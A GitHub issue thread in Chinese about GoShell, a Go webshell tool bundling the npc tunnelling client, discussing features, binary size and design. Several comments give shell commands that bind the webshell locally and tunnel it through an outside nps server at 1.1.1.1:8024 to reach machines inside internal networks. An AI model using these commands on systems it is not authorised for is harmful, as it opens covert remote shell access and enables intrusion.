### ISSUE TITLE
npc和shell共存，实现穿透和webshell共同存在

### ISSUE THREAD

**Issue by wineen** [Wd0g/GoShell#6]
在cli.Start()前面加一个go就可以了。
修改前：cli.Start()
修改后：go cli.Start()
然后把return删掉，另外你在下面补充一个npc的默认支持方式，就可以实现使用npc的同时，还支持shell。

其他缺点：
    1. nps服务器重启后，npc这边不会自动重连，可以尝试想想办法，目前我就只是能用就行。
    2. 数据库操作的实现，期待大佬能够补充一下。
    3. 考虑精简一下二进制大小的话，go本身基础包里面就支持http的，beego可能有的太大了，打出来大概10m左右，稍微算是有点大了。
    4. 关于跨平台打包脚步，可以尝试参考一下这个脚本：[lanproxy-go-client-build-release.sh](https://github.com/ffay/lanproxy-go-client/blob/master/build-release.sh)

**Comment by Wd0g** [comment]
## Q1: "npc和shell共存"是指启动一个进程的情况下同时运行"GoShell"和"NPC"吗?
A1: 可以,但没必要.

## Q2: "nps服务器重启后，npc这边不会自动重连"
A2: 首先你的nps服务器为什么会重启(我在使用过程中没遇到过nps会重启),就算重启了,你在重新执行下 npc就可以解决这个问题
现在你可以想一下,如果把Q1的需求实现了,遇到Q2这种情况是不是会麻烦一点,(参考单一职责原则)

## Q3: " 数据库操作的实现"
A3: 最近要考试,可是我都没打开过书本,哪怕一页... 等我事情完了就会马上更新

## Q4: "精简一下二进制大小"
A4: 如果回到15年前使用2m拨号上网的环境,那这个问题稍微有必要解决下,如果真觉得大可以用upx压缩下

## Q5: "beego可能有的太大了"
A5: 你可以看到cmd/gos/gos.go中的web服务是用golang内置的http包启动的,你说的beego是npc客户端使用的包
我当初把npc集成到gos中就是为了方便不想下载两次
![理解万岁.jpg](https://i.loli.net/2021/08/24/anUjY9yhEHT8sVk.jpg)

**Comment by wineen** [comment]
可以的，能用就行。
期待数据库补充，哈哈

**Comment by wineen** [comment]
### 关于Q1
1. 假设目标为内网服务，且没有外网IP的时候，通过npc做TCP代理，就可以实现webshell的外网转发。
2. 如果考虑一些实际情况的时候，假设即使shell服务器有公网端口，在不需要修改iptables的情况下，webshell不监听外网端口，也可以通过npc做转发。

### 关于Q2
单一职责原则是ok的，但是如果你详细思考一下的话，其实它们并不冲突的，另外只是刚好使用到你这边的工具，仅仅是想相互讨论一下，没有太多别的意思，如果对你产生了一些困扰，我表示抱歉。最后，祝你最近考试加油。

**Comment by Wd0g** [comment]
> ### 关于Q1
> 1. 假设目标为内网服务，且没有外网IP的时候，通过npc做TCP代理，就可以实现webshell的外网转发。
> 2. 如果考虑一些实际情况的时候，假设即使shell服务器有公网端口，在不需要修改iptables的情况下，webshell不监听外网端口，也可以通过npc做转发。
> 
> ### 关于Q2
> 单一职责原则是ok的，但是如果你详细思考一下的话，其实它们并不冲突的，另外只是刚好使用到你这边的工具，仅仅是想相互讨论一下，没有太多别的意思，如果对你产生了一些困扰，我表示抱歉。最后，祝你最近考试加油。

## Q1
没太明白你这里的1和2的意思诶,这就是我在gos中内嵌npc的原因啊,使用npc后,1和2不就迎刃而解了吗
假设现在遇到一台内网机器,不可以启公网端口,但是可以访问外网,此时你只需要这样做
```shell
## 先启动gos的costom服务
./gos -web-addr 127.0.0.1:9010

## 在运行npc
./gos -m npc -server=1.1.1.1:8024 -vkey=key -type=tcp
```
然后去nps的web页面这添加一个tcp端口映射到*127.0.0.1:9010*,这样就可以直接访问gos启动的本地web服务了

## Q2
关于你提到的困扰,我完全没有这样的想法,这里也不是微博有那么多键盘侠
我们只是正常的讨论而已,如果每次讨论都要先打一大段段字先表达自己的情绪背景,那讨论起来就太麻烦了

比如现在,你担心因为你的提问导致我会有一些困扰,因此你专门回复表示你自己没有别的意思,导致我也不想因为你因为我的回复导致你产生一些困扰而重新回复你

看吧,就是这么麻烦, 那么如何解决这个问题呢?
只需要讨论双方达成共识,讨论问题的过程中不会带任何情绪就可以了

就像我第一次回复你的评论中的Q2,Q4,Q5,这三个回答你只用技术角度去看就会发现这三个回复都是在真诚的回答你的疑问
但是你带着情感色彩去看,就会觉得我回复的语气不是很好,会让你产生我因为你的提问而感觉到被冒犯的感觉

~~~

**Comment by wineen** [comment]
> > ### 关于Q1
> > 
> > 1. 假设目标为内网服务，且没有外网IP的时候，通过npc做TCP代理，就可以实现webshell的外网转发。
> > 2. 如果考虑一些实际情况的时候，假设即使shell服务器有公网端口，在不需要修改iptables的情况下，webshell不监听外网端口，也可以通过npc做转发。
> > 
> > ### 关于Q2
> > 单一职责原则是ok的，但是如果你详细思考一下的话，其实它们并不冲突的，另外只是刚好使用到你这边的工具，仅仅是想相互讨论一下，没有太多别的意思，如果对你产生了一些困扰，我表示抱歉。最后，祝你最近考试加油。
> 
> ## Q1
> 没太明白你这里的1和2的意思诶,这就是我在gos中内嵌npc的原因啊,使用npc后,1和2不就迎刃而解了吗
> 假设现在遇到一台内网机器,不可以启公网端口,但是可以访问外网,此时你只需要这样做
> 
> ```shell
> ## 先启动gos的costom服务
> ./gos -web-addr 127.0.0.1:9010
> 
> ## 在运行npc
> ./gos -m npc -server=1.1.1.1:8024 -vkey=key -type=tcp
> ```
> 
> 然后去nps的web页面这添加一个tcp端口映射到_127.0.0.1:9010_,这样就可以直接访问gos启动的本地web服务了

--- 

好的，首先非常感谢你的理解。
回归到技术问题上，因为我的想法是这样，仅仅开一个服务，就能够直接满足两个需求。
 1. webshell
 2. npc-client
```shell
## 考虑直接把两个参数融进去，仅需要启动一个服务即可（目前我就是这么做的）
./gos -m npc-web -server=1.1.1.1:8024 -vkey=key -type=tcp -web-addr 127.0.0.1:9010

## 直接去nps上配置转发出9010的端口即可。
```

>1. 根据你的建议，我尝试使用upx对程序进行了压缩，效果很nice，非常感谢你的建议。
>2. 不太确定我这种想法是否合理，不过我个人的的理解是能够一个服务解决的问题，就不用再次多开，当然附加的就是维护成本。
>3. 另外回到我的初衷，我最早发现这个项目的想法就是想要找一个不需要依赖环境的webshell工具，本项目集成了nps我觉得是一件非常nice的事情，感谢大佬的分享。

**Comment by Wd0g** [comment]
可以,但是没必要
1: 命令执行两次就可以达到你想要的目的
2: 如果改成你的需求,我想单独开npc或者gos就比较麻烦,有的环境下是不需要开npc的
3: 我自己觉得你这样的方式比较臃肿

**Comment by wineen** [comment]
好的，我只是说可以提供这么一个方式，多个参数可选，我也觉得有些臃肿，哈哈
